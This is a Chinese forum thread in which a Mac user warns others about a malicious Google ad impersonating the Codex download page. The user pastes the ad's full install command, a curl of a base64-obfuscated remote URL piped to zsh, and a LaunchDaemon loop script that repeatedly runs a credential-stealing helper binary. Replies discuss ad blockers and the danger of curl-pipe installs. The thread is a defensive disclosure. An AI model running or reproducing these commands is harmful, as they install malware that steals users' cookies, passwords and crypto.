rt ,这个也确实怪我大意了,不小心中招了,发个帖希望各位站友别犯错
今天用 cc 编码,minmax 模型实在是问题多,我就去 google 搜 codex 官网,下载 codex 试试的
搜索的第一个我就点击进去了(截止发帖时间,依然在第一个),我后面对比了下与 chatgpt 的页面一毛一样
然后我点击第一个链接进去后,按照页面提示点击安装按钮
安装命令我贴出来下
echo "Downloading Codex: https://chatgpt.com/codex-app/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9ncmVlbmFjdGl2LmNvbS9jdXJsLzRhZjU5ZjBmYTY3YjI5MDljOWQxMWFmM2UwMmE3OTE4MjcxMDhlMmQ1MjU5OGMyN2Y2Mjg2NmEwNDAzMDk2Mzc=" | openssl base64 -d -A) | zsh
这个脚本各种混淆,以及 echo 复杂。。翻译了好半天才找到位置
我的系统是mac ,m3,当前搜索的结果的第一个依然是有病毒的那个,链接地址是:https://sites.google.com/view/mcodxa05?gad_source=1&gad_campaignid=23830654967&gbraid=0AAAABCyPF1X_F5PgAUkSXPc81geK40xyU&gclid=Cj0KCQjw_IXQBhCkARIsADqELbIIIUvj_LG5kiLa0FV0sMTckIfL_HIk4W7aYRY-J-e1PJ3eLmYR86UaAo_iEALw_wcB
病毒的情况是:我安装后,提示我输入密码,我输入后在/Library/LaunchDaemons 中增加一个启动项,启动的内容是home目录下, /Users/xxx/Library/Application Support/.com.apple.accountsd/.service .service的内容在下面,每一秒启动一次AccountsHelper,AccountsHelper是一个二进制程序看不到内容,gemini 给分析是在不断获取cookies 、账号密码加密货币等信息
while true; do
osascript <<EOF
set loginContent to do shell script "stat -f \"%Su\" /dev/console"
if loginContent is not equal to "" and loginContent is not equal to "root"
do shell script "sudo -u " & quoted form of loginContent & " '/Users/zrc/Library/Application Support/.com.apple.accountsd/AccountsHelper'"
end if
EOF
sleep 1
done
 |
1
mangmaimu 9h 27m ago via iPhone
从来没看到过赞助商广告,不知道是区域不同,还是 adguard 或者 UBlock 过滤了
|
 |
2
zrc OP 是我太大意了。。走的代理,区域是香港。
这个域名还是 business.google.com 第一眼看是 google 的域名,也就点进去了。。唉,长记性了 |
 |
3
HFX3389 9h 22m ago
前面给个真的,后面掺上假的
|
 |
4
shoaly 9h 14m ago
装一个 去广告插件的重要性就来了
|
 |
5
since2021 9h 13m ago
为什么不装 ubo ~
|
 |
6
dryyun 9h 8m ago
@zrc #2 这域名不是 google.com 域名吗? 看着二级域名不同而已。
|
 |
7
AlexaZhou 9h 8m ago  4
我一直觉得这种复制一个命令,让用户自己来安装软件的方式,对用户非常危险,根本就不知道装了什么,有没有病毒,今天这就有人中招了
建议大家要抵制这种,尽量不要用这种方式安装 |
 |
9
psllll 9h 3m ago
这网站怎么 520 了
|
 |
10
e23nome 9h 2m ago
@since2021 有数据称 32.5%的美国互联网用户会使用广告拦截工具。
所以美国的虚假竞价排名广告的受害者也是很多的。这也是为什么有这种赞助商广告,并附加月访问量超过 100 万次的背书(虽然有知识的人会觉得太少了)。 谷歌和脸书的收入里相当比例的都是这种诈骗/虚假/恶意广告,哈哈。 |
|
11
e23nome 8h 55m ago
而且这个图(去红框)喂给 AI ,AI 很容易告诉你这个广告是假的。
为啥谷歌投放广告的入口却没有 AI 筛查,就不得而知了。 |
|
12
e23nome 8h 50m ago
chatGPT 说
2. 第二个广告:business.google.com / Install ChatGPT Codex 这个比较奇怪。标题是 ChatGPT Codex ,但显示域名是 business.google.com 。不一定就是诈骗,也可能是 Google Business/广告跳转配置问题,但我会谨慎,不建议点。 我的之所以是第二个,因为我的搜索页面显示了两个赞助商广告,第一个是 openAI 自己投的。 |
 |
13
realpg PRO 3
google 搜出来竞价病毒: 大家警惕避雷
百度搜出来竞价虚假网站: 百度傻逼 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx 百度 xxx |
 |
14
Kizishao 8h 19m ago
把安装脚本发给 Gemini ,回复称其为一段典型的恶意脚本,并称其为“恶意广告欺诈”,是通过高价竞价竞标来的。它还提醒 curl | sh 的安装方式极端危险,除非官方文档。
Google 自己都没有用自家的 AI 去审核,实在有些说不过去。 |
 |
15
layden 8h 19m ago
装个 uBlock 吧,不会吃太多性能的。
|
 |
17
zpvip 8h 3m ago
你能把链接贴出来吗,网页截图上显示的 business.google.com 我打开是正常的 Google 子站,我都是自动登录的状态。
Google 赞助商允许链接显示 business.google.com ,但实际链接变成病毒站?你是不是浏览器中毒在先? |
 |
18
ragnaroks 7h 53m ago
看起来是拓展或用户脚本注入的?
无任何拓展的全新 chrome 多次实验不同的常见搜索词,没有一个搜索结果下面是有"过去一个月内访问量超过 100 万次"这种文本的 |
|
19
ragnaroks 7h 51m ago
|
|
20
psllll 7h 46m ago
|
 |
21
hackroad 7h 34m ago
 |
 |
22
xingheng 4h 7m ago 1
|
 |
24
maydb 2h 39m ago
请问中了什么病毒?能多说两句吗?
|
 |
25
kanezeng 1h 55m ago
@psllll 我点进去和你这个链接一样,是个叫 Royalblend4 的软件。比较分裂的是网页标题还是 Codex 。不过页面本身没有任何 Codex 相关的东西。以前还真没注意这个事,因为页面上有表明“赞助商搜索结果”,我都是直接跳过这那一部分。
|
 |
26
Vancion 1h 43m ago via iPhone
现在还是诈骗网站,难道还根据 ip/ua 做了分流?顺手点举报了。
|
 |
27
GoogolChrome111 52 mins ago
我是 ChatGPT 官网进去,然后在 Microsoft Store 安装的
|
 |
28
iorilu 40 mins ago
codex cli 命令行就装阿
你要 app, 那就用 windows store, 搜 codex 就行 |
 |
30
383394544 1 min ago
你都用 mac 了还不用 homebrew
|
Select Language